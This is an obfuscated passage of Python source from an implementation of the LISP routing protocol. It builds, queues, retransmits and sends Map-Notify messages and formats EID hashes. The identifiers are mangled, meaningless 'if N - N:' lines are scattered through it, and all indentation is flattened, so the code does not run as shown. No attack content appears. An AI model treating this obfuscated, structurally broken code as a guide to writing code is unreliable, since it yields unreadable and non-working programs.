if 80 - 80: I1IiiI - i11iIiiIii
if 39 - 39: I11i / O0 - I1ii11iIi11i . Oo0Ooo * OoooooooOO / o0oOOo0O0Ooo
def lisp_retransmit_map_notify ( map_notify ) :
OooOOooo = map_notify . etr
O00oo0o0o0oo = map_notify . etr_port
if 71 - 71: O0 . OoooooooOO + Oo0Ooo . ooOoO0o / Ii1I
if 92 - 92: I1ii11iIi11i . oO0o
if 8 - 8: o0oOOo0O0Ooo / oO0o
if 68 - 68: I1Ii111 % Ii1I * Oo0Ooo - O0 . IiII
if 1 - 1: I1ii11iIi11i
if ( map_notify . retry_count == LISP_MAX_MAP_NOTIFY_RETRIES ) :
lprint ( "Map-Notify with nonce 0x{} retry limit reached for ETR {}" . format ( map_notify . nonce_key , red ( OooOOooo . print_address ( ) , False ) ) )
if 18 - 18: i11iIiiIii % OoO0O00 % OOooOOo . OOooOOo * Ii1I / II111iiii
if 81 - 81: iII111i % IiII / I11i
III11II111 = map_notify . nonce_key
if ( III11II111 in lisp_map_notify_queue ) :
map_notify . retransmit_timer . cancel ( )
lprint ( "Dequeue Map-Notify from retransmit queue, key is: {}" . format ( III11II111 ) )
if 50 - 50: IiII + i1IIi % I1Ii111
try :
lisp_map_notify_queue . pop ( III11II111 )
except :
lprint ( "Key not found in Map-Notify queue" )
if 72 - 72: I1Ii111
if 6 - 6: II111iiii - i1IIi
return
if 78 - 78: OoOoOO00 - Oo0Ooo * II111iiii % iIii1I11I1II1 . i11iIiiIii % iII111i
if 85 - 85: I1ii11iIi11i + OOooOOo % i1IIi
IiI11IIIIIi = map_notify . lisp_sockets
map_notify . retry_count += 1
if 13 - 13: OOooOOo + i11iIiiIii / OOooOOo . O0 . OoO0O00 - Ii1I
lprint ( "Retransmit {} with nonce 0x{} to xTR {}, retry {}" . format ( bold ( "Map-Notify" , False ) , map_notify . nonce_key ,
# IiII % OoOoOO00
red ( OooOOooo . print_address ( ) , False ) , map_notify . retry_count ) )
if 32 - 32: O0 . iII111i / i1IIi . IiII
lisp_send_map_notify ( IiI11IIIIIi , map_notify . packet , OooOOooo , O00oo0o0o0oo )
if ( map_notify . site ) : map_notify . site . map_notifies_sent += 1
if 12 - 12: OoooooooOO * I1ii11iIi11i + I1ii11iIi11i
if 1 - 1: i11iIiiIii . iII111i * OoOoOO00
if 66 - 66: i1IIi / IiII
if 17 - 17: O0 - OOooOOo
map_notify . retransmit_timer = threading . Timer ( LISP_MAP_NOTIFY_INTERVAL ,
lisp_retransmit_map_notify , [ map_notify ] )
map_notify . retransmit_timer . start ( )
return
if 96 - 96: OOooOOo * I1ii11iIi11i
if 85 - 85: O0 / II111iiii * O0 - iII111i % i11iIiiIii
if 47 - 47: OoOoOO00
if 4 - 4: OOooOOo + I1ii11iIi11i - iII111i + OOooOOo / IiII
if 23 - 23: iIii1I11I1II1 + OoooooooOO + ooOoO0o . iII111i . Oo0Ooo - iIii1I11I1II1
if 25 - 25: O0 + I1IiiI % OOooOOo / Oo0Ooo . IiII / I1Ii111
if 84 - 84: ooOoO0o . O0 + I1IiiI * OoO0O00 - I1IiiI
def lisp_send_merged_map_notify ( lisp_sockets , parent , map_register ,
eid_record ) :
if 24 - 24: Ii1I
if 23 - 23: Oo0Ooo * i1IIi / I1IiiI . I11i - I1ii11iIi11i . iIii1I11I1II1
if 15 - 15: O0 + o0oOOo0O0Ooo / oO0o
if 27 - 27: Ii1I * II111iiii / oO0o
eid_record . rloc_count = len ( parent . registered_rlocs )
O000O0o00oooOO = eid_record . encode ( )
eid_record . print_record ( "Merged Map-Notify " , False )
if 61 - 61: OoO0O00 - I1ii11iIi11i . Ii1I * i11iIiiIii
if 97 - 97: ooOoO0o
if 58 - 58: iII111i
if 47 - 47: II111iiii % Oo0Ooo . iIii1I11I1II1 . oO0o
for O00OO0O0O0ooo in parent . registered_rlocs :
oOiI111IIIiIii = lisp_rloc_record ( )
oOiI111IIIiIii . store_rloc_entry ( O00OO0O0O0ooo )
oOiI111IIIiIii . local_bit = True
oOiI111IIIiIii . probe_bit = False
oOiI111IIIiIii . reach_bit = True
O000O0o00oooOO += oOiI111IIIiIii . encode ( )
oOiI111IIIiIii . print_record ( " " )
del ( oOiI111IIIiIii )
if 85 - 85: O0 * i1IIi . I1IiiI % Oo0Ooo / II111iiii / Ii1I
if 73 - 73: iIii1I11I1II1 % I1Ii111 * I1IiiI * II111iiii . I1ii11iIi11i
if 36 - 36: i11iIiiIii * IiII - I11i * OoOoOO00 + OoO0O00 * I1Ii111
if 14 - 14: II111iiii . O0 + ooOoO0o
if 62 - 62: II111iiii * o0oOOo0O0Ooo . OoO0O00 / II111iiii
for O00OO0O0O0ooo in parent . registered_rlocs :
OooOOooo = O00OO0O0O0ooo . rloc
IIiiIiI = lisp_map_notify ( lisp_sockets )
IIiiIiI . record_count = 1
oo0OO0oo = map_register . key_id
IIiiIiI . key_id = oo0OO0oo
IIiiIiI . alg_id = map_register . alg_id
IIiiIiI . auth_len = map_register . auth_len
IIiiIiI . nonce = map_register . nonce
IIiiIiI . nonce_key = lisp_hex_string ( IIiiIiI . nonce )
IIiiIiI . etr . copy_address ( OooOOooo )
IIiiIiI . etr_port = map_register . sport
IIiiIiI . site = parent . site
OO0Oo00OO0oo = IIiiIiI . encode ( O000O0o00oooOO , parent . site . auth_key [ oo0OO0oo ] )
IIiiIiI . print_notify ( )
if 34 - 34: OOooOOo / I11i / OoooooooOO + i11iIiiIii / II111iiii - O0
if 37 - 37: i1IIi . oO0o * o0oOOo0O0Ooo + I1ii11iIi11i - OoO0O00
if 62 - 62: I11i * oO0o
if 91 - 91: I1Ii111
III11II111 = IIiiIiI . nonce_key
if ( III11II111 in lisp_map_notify_queue ) :
OOO = lisp_map_notify_queue [ III11II111 ]
OOO . retransmit_timer . cancel ( )
del ( OOO )
if 98 - 98: iII111i . I1Ii111 % II111iiii
lisp_map_notify_queue [ III11II111 ] = IIiiIiI
if 28 - 28: OoOoOO00 * I1ii11iIi11i / Oo0Ooo
if 17 - 17: I1Ii111 - OOooOOo . ooOoO0o - i1IIi * ooOoO0o * I1ii11iIi11i
if 16 - 16: I1ii11iIi11i . o0oOOo0O0Ooo * iIii1I11I1II1
if 15 - 15: iII111i + o0oOOo0O0Ooo / IiII
lprint ( "Send merged Map-Notify to ETR {}" . format ( red ( OooOOooo . print_address ( ) , False ) ) )
if 33 - 33: OoooooooOO . IiII * o0oOOo0O0Ooo
lisp_send ( lisp_sockets , OooOOooo , LISP_CTRL_PORT , OO0Oo00OO0oo )
if 41 - 41: Ii1I . iII111i . o0oOOo0O0Ooo % OoooooooOO % IiII
parent . site . map_notifies_sent += 1
if 81 - 81: IiII * i11iIiiIii + i1IIi + OOooOOo . i1IIi
if 6 - 6: i11iIiiIii - oO0o % OoO0O00 + iIii1I11I1II1
if 69 - 69: IiII
if 13 - 13: i11iIiiIii
IIiiIiI . retransmit_timer = threading . Timer ( LISP_MAP_NOTIFY_INTERVAL ,
lisp_retransmit_map_notify , [ IIiiIiI ] )
IIiiIiI . retransmit_timer . start ( )
if 49 - 49: OoOoOO00
return
if 61 - 61: I1Ii111 / I1Ii111 / iII111i / ooOoO0o - I1IiiI . o0oOOo0O0Ooo
if 80 - 80: I1IiiI - OOooOOo . oO0o
if 75 - 75: oO0o + OoOoOO00 - OoooooooOO
if 38 - 38: I11i / ooOoO0o / OoOoOO00 * OOooOOo . oO0o
if 8 - 8: OoO0O00 . OOooOOo % I1Ii111 * OOooOOo / I1IiiI
if 3 - 3: IiII - I1ii11iIi11i . o0oOOo0O0Ooo
if 39 - 39: oO0o . I1Ii111 + oO0o % OoOoOO00 - i11iIiiIii
def lisp_build_map_notify ( lisp_sockets , eid_records , eid_list , record_count ,
source , port , nonce , key_id , alg_id , auth_len , site , map_register_ack ) :
if 69 - 69: I11i / OoO0O00
III11II111 = lisp_hex_string ( nonce ) + source . print_address ( )
if 73 - 73: i11iIiiIii / i1IIi
if 8 - 8: O0 / OOooOOo + iII111i % iIii1I11I1II1 % iIii1I11I1II1 . ooOoO0o
if 47 - 47: OoO0O00 / o0oOOo0O0Ooo / Ii1I * I1IiiI % ooOoO0o / I1Ii111
if 80 - 80: I1Ii111 / O0 * O0
if 40 - 40: OoO0O00 - oO0o / o0oOOo0O0Ooo . oO0o
if 89 - 89: i11iIiiIii - II111iiii
lisp_remove_eid_from_map_notify_queue ( eid_list )
if ( III11II111 in lisp_map_notify_queue ) :
IIiiIiI = lisp_map_notify_queue [ III11II111 ]
I1iiIi111I = red ( source . print_address_no_iid ( ) , False )
lprint ( "Map-Notify with nonce 0x{} pending for xTR {}" . format ( lisp_hex_string ( IIiiIiI . nonce ) , I1iiIi111I ) )
if 67 - 67: IiII % I1Ii111 + i11iIiiIii
return
if 53 - 53: OOooOOo
if 95 - 95: oO0o - OOooOOo % I1Ii111 / OoooooooOO % OoooooooOO - O0
IIiiIiI = lisp_map_notify ( lisp_sockets )
IIiiIiI . record_count = record_count
key_id = key_id
IIiiIiI . key_id = key_id
IIiiIiI . alg_id = alg_id
IIiiIiI . auth_len = auth_len
IIiiIiI . nonce = nonce
IIiiIiI . nonce_key = lisp_hex_string ( nonce )
IIiiIiI . etr . copy_address ( source )
IIiiIiI . etr_port = port
IIiiIiI . site = site
IIiiIiI . eid_list = eid_list
if 21 - 21: I1Ii111 . i1IIi - iII111i % I1ii11iIi11i . OOooOOo
if 52 - 52: Ii1I * I1ii11iIi11i
if 21 - 21: I1IiiI . i11iIiiIii - o0oOOo0O0Ooo * II111iiii % iIii1I11I1II1
if 9 - 9: I1ii11iIi11i + I11i
if ( map_register_ack == False ) :
III11II111 = IIiiIiI . nonce_key
lisp_map_notify_queue [ III11II111 ] = IIiiIiI
if 20 - 20: iII111i + i1IIi / oO0o % OoooooooOO * OoOoOO00
if 70 - 70: Oo0Ooo - OOooOOo * OOooOOo / o0oOOo0O0Ooo
if ( map_register_ack ) :
lprint ( "Send Map-Notify to ack Map-Register" )
else :
lprint ( "Send Map-Notify for RLOC-set change" )
if 4 - 4: OoOoOO00 / OoO0O00
if 66 - 66: I1Ii111 / OoOoOO00
if 53 - 53: OoOoOO00 . i11iIiiIii - OoooooooOO
if 92 - 92: O0 - i11iIiiIii + OoO0O00 - OoooooooOO - o0oOOo0O0Ooo
if 25 - 25: oO0o / oO0o / Ii1I / O0
OO0Oo00OO0oo = IIiiIiI . encode ( eid_records , site . auth_key [ key_id ] )
IIiiIiI . print_notify ( )
if 56 - 56: ooOoO0o
if ( map_register_ack == False ) :
IiOo0oOoooO = lisp_eid_record ( )
IiOo0oOoooO . decode ( eid_records )
IiOo0oOoooO . print_record ( " " , False )
if 19 - 19: O0 * I1IiiI + I1ii11iIi11i
if 25 - 25: I11i - ooOoO0o / OoO0O00 / iII111i - OoO0O00
if 86 - 86: OoO0O00
if 89 - 89: OoooooooOO % iII111i * I1ii11iIi11i + I1ii11iIi11i . Oo0Ooo
if 4 - 4: I11i
lisp_send_map_notify ( lisp_sockets , OO0Oo00OO0oo , IIiiIiI . etr , port )
site . map_notifies_sent += 1
if 8 - 8: IiII
if ( map_register_ack ) : return
if 1 - 1: ooOoO0o . IiII
if 4 - 4: iIii1I11I1II1 % I1IiiI - OoooooooOO / iII111i
if 55 - 55: O0 + iII111i * OoOoOO00 . i11iIiiIii * Ii1I + oO0o
if 66 - 66: i1IIi . I1ii11iIi11i
if 86 - 86: Oo0Ooo
if 48 - 48: OoO0O00
IIiiIiI . retransmit_timer = threading . Timer ( LISP_MAP_NOTIFY_INTERVAL ,
lisp_retransmit_map_notify , [ IIiiIiI ] )
IIiiIiI . retransmit_timer . start ( )
return
if 55 - 55: OoO0O00 * i1IIi * I11i / iII111i
if 42 - 42: IiII
if 28 - 28: OoOoOO00 + OoOoOO00
if 53 - 53: II111iiii % i1IIi + ooOoO0o . I1Ii111
if 52 - 52: I1IiiI + I1Ii111 * oO0o / i11iIiiIii * iIii1I11I1II1
if 27 - 27: Oo0Ooo
if 85 - 85: iIii1I11I1II1 . o0oOOo0O0Ooo + oO0o
if 79 - 79: O0 - iIii1I11I1II1 + i1IIi . I11i
def lisp_send_map_notify_ack ( lisp_sockets , eid_records , map_notify , ms ) :
map_notify . map_notify_ack = True
if 21 - 21: II111iiii
if 23 - 23: I11i * i1IIi . oO0o / IiII + o0oOOo0O0Ooo
if 1 - 1: IiII / OoO0O00 . oO0o * I1Ii111 - i11iIiiIii
if 50 - 50: oO0o - O0 / I1IiiI . OoOoOO00 . Oo0Ooo
OO0Oo00OO0oo = map_notify . encode ( eid_records , ms . password )
map_notify . print_notify ( )
if 30 - 30: IiII . OoO0O00 + Oo0Ooo
if 48 - 48: iIii1I11I1II1 / i11iIiiIii . OoOoOO00 * I11i
if 1 - 1: IiII . OoOoOO00 * o0oOOo0O0Ooo
if 63 - 63: O0 / Ii1I + I1Ii111 % OoO0O00 % OOooOOo * O0
OooOOooo = ms . map_server
lprint ( "Send Map-Notify-Ack to {}" . format (
red ( OooOOooo . print_address ( ) , False ) ) )
lisp_send ( lisp_sockets , OooOOooo , LISP_CTRL_PORT , OO0Oo00OO0oo )
return
if 35 - 35: OoO0O00 + OoooooooOO % Oo0Ooo / I11i - O0 . i1IIi
if 76 - 76: IiII % I1IiiI * Ii1I / Ii1I / OoooooooOO + Ii1I
if 19 - 19: OoooooooOO
if 88 - 88: I1IiiI % ooOoO0o % Oo0Ooo - O0
if 71 - 71: OOooOOo % Ii1I - i11iIiiIii - oO0o . ooOoO0o / I1Ii111
if 53 - 53: iII111i . Oo0Ooo
if 91 - 91: oO0o * OoooooooOO * oO0o % oO0o * II111iiii % I1Ii111
if 8 - 8: Ii1I
def lisp_send_multicast_map_notify ( lisp_sockets , site_eid , eid_list , xtr ) :
if 28 - 28: iII111i / I1ii11iIi11i - OoOoOO00 * Oo0Ooo + Ii1I * OoOoOO00
IIiiIiI = lisp_map_notify ( lisp_sockets )
IIiiIiI . record_count = 1
IIiiIiI . nonce = lisp_get_control_nonce ( )
IIiiIiI . nonce_key = lisp_hex_string ( IIiiIiI . nonce )
IIiiIiI . etr . copy_address ( xtr )
IIiiIiI . etr_port = LISP_CTRL_PORT
IIiiIiI . eid_list = eid_list
III11II111 = IIiiIiI . nonce_key
if 94 - 94: oO0o
if 95 - 95: ooOoO0o * O0 + OOooOOo
if 11 - 11: i1IIi / OoOoOO00 + OoOoOO00 + I1ii11iIi11i + OOooOOo
if 21 - 21: ooOoO0o
if 28 - 28: OoOoOO00 + OoOoOO00 - OoOoOO00 / ooOoO0o
if 81 - 81: oO0o
lisp_remove_eid_from_map_notify_queue ( IIiiIiI . eid_list )
if ( III11II111 in lisp_map_notify_queue ) :
IIiiIiI = lisp_map_notify_queue [ III11II111 ]
lprint ( "Map-Notify with nonce 0x{} pending for ITR {}" . format ( IIiiIiI . nonce , red ( xtr . print_address_no_iid ( ) , False ) ) )
if 34 - 34: o0oOOo0O0Ooo * OOooOOo - i1IIi * o0oOOo0O0Ooo * Oo0Ooo
return
if 59 - 59: iIii1I11I1II1 / Oo0Ooo % II111iiii
if 55 - 55: ooOoO0o - IiII + o0oOOo0O0Ooo
if 48 - 48: O0 - iIii1I11I1II1 * OOooOOo
if 33 - 33: I11i
if 63 - 63: Ii1I % II111iiii / OoOoOO00 + Oo0Ooo
lisp_map_notify_queue [ III11II111 ] = IIiiIiI
if 28 - 28: OoO0O00 + I1IiiI . oO0o + II111iiii - O0
if 32 - 32: oO0o
if 62 - 62: i11iIiiIii + OoooooooOO + IiII - OoO0O00 / oO0o * iIii1I11I1II1
if 91 - 91: o0oOOo0O0Ooo - i11iIiiIii + Oo0Ooo % iIii1I11I1II1
O0O0I11I1111i11i = site_eid . rtrs_in_rloc_set ( )
if ( O0O0I11I1111i11i ) :
if ( site_eid . is_rtr_in_rloc_set ( xtr ) ) : O0O0I11I1111i11i = False
if 41 - 41: I11i % OoO0O00 * OoO0O00
if 24 - 24: i1IIi - o0oOOo0O0Ooo
if 25 - 25: Ii1I . OOooOOo . OoO0O00 - II111iiii . iII111i + II111iiii
if 49 - 49: I1IiiI
if 40 - 40: i1IIi * II111iiii
IiOo0oOoooO = lisp_eid_record ( )
IiOo0oOoooO . record_ttl = 1440
IiOo0oOoooO . eid . copy_address ( site_eid . eid )
IiOo0oOoooO . group . copy_address ( site_eid . group )
IiOo0oOoooO . rloc_count = 0
for iII in site_eid . registered_rlocs :
if ( O0O0I11I1111i11i ^ iII . is_rtr ( ) ) : continue
IiOo0oOoooO . rloc_count += 1
if 57 - 57: iIii1I11I1II1 . OoooooooOO + I1Ii111
OO0Oo00OO0oo = IiOo0oOoooO . encode ( )
if 66 - 66: IiII % IiII - OoooooooOO * i11iIiiIii . OoooooooOO % i11iIiiIii
if 25 - 25: oO0o . OoO0O00 + OoO0O00
if 4 - 4: IiII - Ii1I / iII111i / II111iiii . I1Ii111 * oO0o
if 33 - 33: iIii1I11I1II1 % OoO0O00 + OOooOOo * OoO0O00 / I1Ii111
IIiiIiI . print_notify ( )
IiOo0oOoooO . print_record ( " " , False )
if 96 - 96: iII111i * iII111i / iII111i + I1IiiI
if 16 - 16: II111iiii
if 80 - 80: O0 * I11i * I1Ii111
if 89 - 89: Ii1I * OoO0O00 . i1IIi . O0 - IiII - OoOoOO00
for iII in site_eid . registered_rlocs :
if ( O0O0I11I1111i11i ^ iII . is_rtr ( ) ) : continue
oOiI111IIIiIii = lisp_rloc_record ( )
oOiI111IIIiIii . store_rloc_entry ( iII )
oOiI111IIIiIii . local_bit = True
oOiI111IIIiIii . probe_bit = False
oOiI111IIIiIii . reach_bit = True
OO0Oo00OO0oo += oOiI111IIIiIii . encode ( )
oOiI111IIIiIii . print_record ( " " )
if 25 - 25: iII111i + i1IIi
if 64 - 64: IiII % I11i / iIii1I11I1II1
if 66 - 66: Ii1I
if 55 - 55: OOooOOo + I1IiiI + IiII . Ii1I * oO0o
if 71 - 71: IiII - iII111i % I1IiiI * iII111i
OO0Oo00OO0oo = IIiiIiI . encode ( OO0Oo00OO0oo , "" )
if ( OO0Oo00OO0oo == None ) : return
if 27 - 27: ooOoO0o - OoO0O00
if 83 - 83: iII111i * OoOoOO00 - O0 * Ii1I
if 79 - 79: I11i / iII111i % Ii1I / OoOoOO00 % O0 / IiII
if 32 - 32: IiII * II111iiii . Ii1I
lisp_send_map_notify ( lisp_sockets , OO0Oo00OO0oo , xtr , LISP_CTRL_PORT )
if 68 - 68: I11i / O0
if 6 - 6: oO0o - oO0o . I1IiiI % I1ii11iIi11i
if 22 - 22: Ii1I / I1IiiI / II111iiii
if 31 - 31: II111iiii - Ii1I * OOooOOo - i11iIiiIii / OoooooooOO - I1Ii111
IIiiIiI . retransmit_timer = threading . Timer ( LISP_MAP_NOTIFY_INTERVAL ,
lisp_retransmit_map_notify , [ IIiiIiI ] )
IIiiIiI . retransmit_timer . start ( )
return
if 76 - 76: Oo0Ooo
if 93 - 93: i1IIi - I1IiiI * i11iIiiIii / Ii1I . Ii1I - i1IIi
if 19 - 19: iIii1I11I1II1 * OOooOOo * Oo0Ooo % I1IiiI
if 93 - 93: IiII % OoOoOO00 / I1IiiI + o0oOOo0O0Ooo * ooOoO0o / i1IIi
if 25 - 25: O0 / Oo0Ooo - o0oOOo0O0Ooo * Oo0Ooo
if 45 - 45: Ii1I * IiII - OOooOOo
if 57 - 57: iII111i % OoO0O00 / OoooooooOO
def lisp_queue_multicast_map_notify ( lisp_sockets , rle_list ) :
oOOO00o0O = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 74 - 74: I1IiiI % OOooOOo + Oo0Ooo % IiII + I1Ii111
for I1iiIiI1II1ii in rle_list :
IIIIi1IiiI1 = lisp_site_eid_lookup ( I1iiIiI1II1ii [ 0 ] , I1iiIiI1II1ii [ 1 ] , True )
if ( IIIIi1IiiI1 == None ) : continue
if 67 - 67: II111iiii
if 80 - 80: OoOoOO00 . I1ii11iIi11i / iII111i - I1Ii111
if 26 - 26: OoooooooOO / oO0o . IiII / OOooOOo / iIii1I11I1II1 / OoOoOO00
if 91 - 91: i11iIiiIii % O0 . Oo0Ooo / I1Ii111
if 62 - 62: Oo0Ooo . II111iiii % OoO0O00 . Ii1I * OOooOOo + II111iiii
if 7 - 7: OOooOOo
if 22 - 22: Oo0Ooo + ooOoO0o
O00 = IIIIi1IiiI1 . registered_rlocs
if ( len ( O00 ) == 0 ) :
o0IiiI = { }
for Ii111i1 in list ( IIIIi1IiiI1 . individual_registrations . values ( ) ) :
for iII in Ii111i1 . registered_rlocs :
if ( iII . is_rtr ( ) == False ) : continue
o0IiiI [ iII . rloc . print_address ( ) ] = iII
if 55 - 55: II111iiii
if 56 - 56: OoOoOO00 . IiII / iII111i / II111iiii
O00 = list ( o0IiiI . values ( ) )
if 29 - 29: Oo0Ooo
if 80 - 80: OoOoOO00
if 65 - 65: o0oOOo0O0Ooo + O0 - iIii1I11I1II1
if 12 - 12: OoooooooOO
if 61 - 61: oO0o / o0oOOo0O0Ooo * iIii1I11I1II1 . O0
if 7 - 7: OoOoOO00 + OoO0O00 * I1IiiI
oO00oO = [ ]
o0oOOo000 = False
if ( IIIIi1IiiI1 . eid . address == 0 and IIIIi1IiiI1 . eid . mask_len == 0 ) :
O00OO0ooo = [ ]
iiii = [ ]
if ( len ( O00 ) != 0 and O00 [ 0 ] . rle != None ) :
iiii = O00 [ 0 ] . rle . rle_nodes
if 82 - 82: iII111i % i11iIiiIii
for IIIi11i1 in iiii :
oO00oO . append ( IIIi11i1 . address )
O00OO0ooo . append ( IIIi11i1 . address . print_address_no_iid ( ) )
if 16 - 16: I1IiiI + i1IIi + oO0o % Ii1I % OoO0O00 . o0oOOo0O0Ooo
lprint ( "Notify existing RLE-nodes {}" . format ( O00OO0ooo ) )
else :
if 35 - 35: IiII
if 15 - 15: OoooooooOO / o0oOOo0O0Ooo % iII111i . Oo0Ooo / i1IIi / i11iIiiIii
if 77 - 77: I1Ii111
if 92 - 92: iII111i * i11iIiiIii * o0oOOo0O0Ooo * OoO0O00
if 70 - 70: Ii1I
for iII in O00 :
if ( iII . is_rtr ( ) ) : oO00oO . append ( iII . rloc )
if 51 - 51: i1IIi % Oo0Ooo
if 32 - 32: OoOoOO00 + iIii1I11I1II1 . OoO0O00 . I1ii11iIi11i . IiII
if 97 - 97: ooOoO0o * ooOoO0o * iIii1I11I1II1 * I1Ii111 + iII111i + OoOoOO00
if 8 - 8: Oo0Ooo . oO0o + II111iiii
if 100 - 100: OoOoOO00 . IiII / OoO0O00 * OoooooooOO - OoOoOO00
o0oOOo000 = ( len ( oO00oO ) != 0 )
if ( o0oOOo000 == False ) :
i1iI11i = lisp_site_eid_lookup ( I1iiIiI1II1ii [ 0 ] , oOOO00o0O , False )
if ( i1iI11i == None ) : continue
if 98 - 98: OoO0O00 / I1ii11iIi11i + I1ii11iIi11i
for iII in i1iI11i . registered_rlocs :
if ( iII . rloc . is_null ( ) ) : continue
oO00oO . append ( iII . rloc )
if 70 - 70: i1IIi % Oo0Ooo % I1Ii111 + I11i . ooOoO0o
if 66 - 66: i11iIiiIii % I11i / Oo0Ooo * oO0o
if 7 - 7: O0 - Ii1I - oO0o
if 95 - 95: i1IIi - OOooOOo / OoOoOO00 + I1ii11iIi11i + O0
if 10 - 10: ooOoO0o - OOooOOo + i1IIi * Ii1I
if 78 - 78: iIii1I11I1II1
if ( len ( oO00oO ) == 0 ) :
lprint ( "No ITRs or RTRs found for {}, Map-Notify suppressed" . format ( green ( IIIIi1IiiI1 . print_eid_tuple ( ) , False ) ) )
if 76 - 76: ooOoO0o - i11iIiiIii * I11i / I1IiiI - OOooOOo
continue
if 41 - 41: iII111i
if 91 - 91: I1Ii111
if 54 - 54: o0oOOo0O0Ooo . i1IIi / iII111i
if 21 - 21: O0 + ooOoO0o
if 53 - 53: Ii1I - II111iiii * iIii1I11I1II1
if 91 - 91: OoOoOO00 % iIii1I11I1II1
for O00OO0O0O0ooo in oO00oO :
lprint ( "Build Map-Notify to {}TR {} for {}" . format ( "R" if o0oOOo000 else "x" , red ( O00OO0O0O0ooo . print_address_no_iid ( ) , False ) ,
# II111iiii + OoO0O00 . iIii1I11I1II1 + iIii1I11I1II1 - o0oOOo0O0Ooo
green ( IIIIi1IiiI1 . print_eid_tuple ( ) , False ) ) )
if 73 - 73: I11i . I1ii11iIi11i - OoO0O00 + OoooooooOO
oo0OO = [ IIIIi1IiiI1 . print_eid_tuple ( ) ]
lisp_send_multicast_map_notify ( lisp_sockets , IIIIi1IiiI1 , oo0OO , O00OO0O0O0ooo )
time . sleep ( .001 )
if 91 - 91: OoooooooOO * o0oOOo0O0Ooo
if 14 - 14: I1Ii111 * OoO0O00 + II111iiii / OoO0O00 . IiII
return
if 26 - 26: I1IiiI + Ii1I / iII111i / Ii1I + iIii1I11I1II1 * I1ii11iIi11i
if 7 - 7: i1IIi + iIii1I11I1II1 % I1ii11iIi11i
if 33 - 33: oO0o . oO0o / IiII + II111iiii
if 34 - 34: OoO0O00 . OoOoOO00 / i1IIi / OOooOOo
if 12 - 12: o0oOOo0O0Ooo . Oo0Ooo / II111iiii
if 18 - 18: I1Ii111 % II111iiii + Ii1I * Oo0Ooo - OoooooooOO . Oo0Ooo
if 25 - 25: OoO0O00
if 83 - 83: II111iiii . iIii1I11I1II1
def lisp_find_sig_in_rloc_set ( packet , rloc_count ) :
for OoOOoO0oOo in range ( rloc_count ) :
oOiI111IIIiIii = lisp_rloc_record ( )
packet = oOiI111IIIiIii . decode ( packet , None )
OooO0oIi1Ii111iIi = oOiI111IIIiIii . json
if ( OooO0oIi1Ii111iIi == None ) : continue
if 45 - 45: I1IiiI . ooOoO0o - OoooooooOO
try :
OooO0oIi1Ii111iIi = json . loads ( OooO0oIi1Ii111iIi . json_string )
except :
lprint ( "Found corrupted JSON signature" )
continue
if 84 - 84: I1ii11iIi11i
if 69 - 69: I1Ii111 + II111iiii
if ( "signature" not in OooO0oIi1Ii111iIi ) : continue
return ( oOiI111IIIiIii )
if 92 - 92: OoooooooOO
return ( None )
if 80 - 80: I1ii11iIi11i % I1ii11iIi11i . OoO0O00 . oO0o % I1IiiI % I11i
if 4 - 4: OoO0O00 / iII111i / I1ii11iIi11i - o0oOOo0O0Ooo * I1Ii111
if 24 - 24: OoooooooOO / ooOoO0o + Oo0Ooo - OOooOOo - o0oOOo0O0Ooo . I1ii11iIi11i
if 2 - 2: I1IiiI . o0oOOo0O0Ooo / Oo0Ooo - OoOoOO00 - OoooooooOO
if 73 - 73: I1Ii111 . i11iIiiIii * ooOoO0o . IiII - I11i + I1Ii111
if 21 - 21: I1Ii111 + iIii1I11I1II1 + I1IiiI / O0 * I1ii11iIi11i
if 57 - 57: OOooOOo * I11i . oO0o
if 17 - 17: iII111i - OOooOOo * I1IiiI + i1IIi % I1ii11iIi11i
if 71 - 71: Ii1I - o0oOOo0O0Ooo - oO0o
if 27 - 27: O0 - iIii1I11I1II1
if 78 - 78: Oo0Ooo / o0oOOo0O0Ooo
if 35 - 35: o0oOOo0O0Ooo . OoO0O00 / o0oOOo0O0Ooo / IiII - I1ii11iIi11i . Oo0Ooo
if 97 - 97: i11iIiiIii + I1ii11iIi11i - I11i . oO0o
if 76 - 76: IiII * II111iiii * I1ii11iIi11i + OoooooooOO - OoOoOO00 . Ii1I
if 51 - 51: II111iiii % I1Ii111 * O0 . ooOoO0o * OoOoOO00
if 17 - 17: I1IiiI % I11i
if 28 - 28: I1ii11iIi11i * OoooooooOO
if 19 - 19: Oo0Ooo - iII111i % OoOoOO00 * i11iIiiIii / oO0o . i11iIiiIii
if 46 - 46: I1ii11iIi11i
def lisp_get_eid_hash ( eid ) :
II1I1IIi1111I = None
for I11iI in lisp_eid_hashes :
if 66 - 66: Ii1I
if 39 - 39: I11i
if 30 - 30: Ii1I % i11iIiiIii % I1IiiI * I1ii11iIi11i
if 4 - 4: iIii1I11I1II1 + Ii1I % I1Ii111 . OoOoOO00 % OoooooooOO + II111iiii
i1oO00O = I11iI . instance_id
if ( i1oO00O == - 1 ) : I11iI . instance_id = eid . instance_id
if 48 - 48: ooOoO0o + ooOoO0o
OoOoO = eid . is_more_specific ( I11iI )
I11iI . instance_id = i1oO00O
if ( OoOoO ) :
II1I1IIi1111I = 128 - I11iI . mask_len
break
if 86 - 86: OOooOOo . II111iiii + oO0o + o0oOOo0O0Ooo % iII111i
if 89 - 89: OOooOOo
if ( II1I1IIi1111I == None ) : return ( None )
if 16 - 16: Ii1I
Ii1IiIIIi = eid . address
Oo0OOOo = ""
for OoOOoO0oOo in range ( 0 , old_div ( II1I1IIi1111I , 16 ) ) :
oOOOo0o = Ii1IiIIIi & 0xffff
oOOOo0o = hex ( oOOOo0o ) [ 2 : - 1 ]
Oo0OOOo = oOOOo0o . zfill ( 4 ) + ":" + Oo0OOOo
Ii1IiIIIi >>= 16
if 51 - 51: OoO0O00 + I1IiiI % I1IiiI
if ( II1I1IIi1111I % 16 != 0 ) :
oOOOo0o = Ii1IiIIIi & 0xff
oOOOo0o = hex ( oOOOo0o ) [ 2 : - 1 ]
Oo0OOOo = oOOOo0o . zfill ( 2 ) + ":" + Oo0OOOo
if 42 - 42: o0oOOo0O0Ooo + i11iIiiIii
return ( Oo0OOOo [ 0 : - 1 ] )
if 96 - 96: ooOoO0o / OoooooooOO + IiII + iIii1I11I1II1 - i11iIiiIii
if 6 - 6: oO0o / i1IIi + II111iiii
if 63 - 63: oO0o - II111iiii * OoOoOO00
if 29 - 29: OOooOOo
if 38 - 38: i1IIi % OoooooooOO
if 5 - 5: iIii1I11I1II1 + iIii1I11I1II1 . iIii1I11I1II1 + o0oOOo0O0Ooo
if 45 - 45: I1IiiI - OoooooooOO - I1Ii111 - i1IIi - OoooooooOO * O0
